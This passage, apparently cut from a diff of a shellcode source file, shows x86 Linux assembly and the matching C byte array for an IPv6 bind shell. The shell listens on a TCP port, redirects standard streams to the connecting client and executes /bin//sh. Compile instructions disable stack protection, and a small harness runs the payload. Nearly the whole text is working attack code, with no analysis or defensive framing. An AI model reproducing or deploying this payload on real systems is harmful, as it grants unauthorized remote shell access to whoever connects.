0x0a ;AF_INET6 +mov ecx,esp +push 0x1c +push ecx +push esi +dec ebx +mov bl,0x2 +mov ecx,esp +mov al,0x66 +int 80h + +;;listen +xor eax,eax +xor ebx,ebx +push byte 0x2 +push esi +mov ecx,esp +mov bl,0x4 +mov al,0x66 +int 80h + +;;accept +xor ebx,ebx +push ebx +push ebx +push esi +mul ebx +mov bl,0x5 +mov al,0x66 +mov ecx,esp +int 80h + +sub ecx, ecx +mov cl, 0x2 ;initiate counter +xchg ebx,eax ;save clientfd + +; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2) +loop2: + mov al, 0x3f ;syscall: sys_dup2 + int 0x80 ;exec sys_dup2 + dec ecx ;decrement loop-counter + jns loop2 ;as long as SF is not set -> jmp to loop + +;;execve(/bin//sh) +xor edx,edx +push edx ;null terminated /bin//sh +push 0x68732f2f ;"hs//" +push 0x6e69622f ;"nib/" +mov ebx,esp +push edx +push ebx +mov ecx,esp +mov al,0x0b ;execve() +int 0x80 + +*/ + +/* +to compile the shellcode + +$gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode +$./shellcode + +*/ + + +#include + +unsigned char shellcode[] = \ +"\x6a\x06\x6a\x01\x6a\x0a\x31\xc0\x31\xdb\xb0\x66\x43\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x4b\xb3\x02\x89\xe1\xb0\x66\xcd\x80\x31\xc0\x31\xdb\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xf7\xe3\xb3\x05\xb0\x66\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; + + +main() +{ + printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file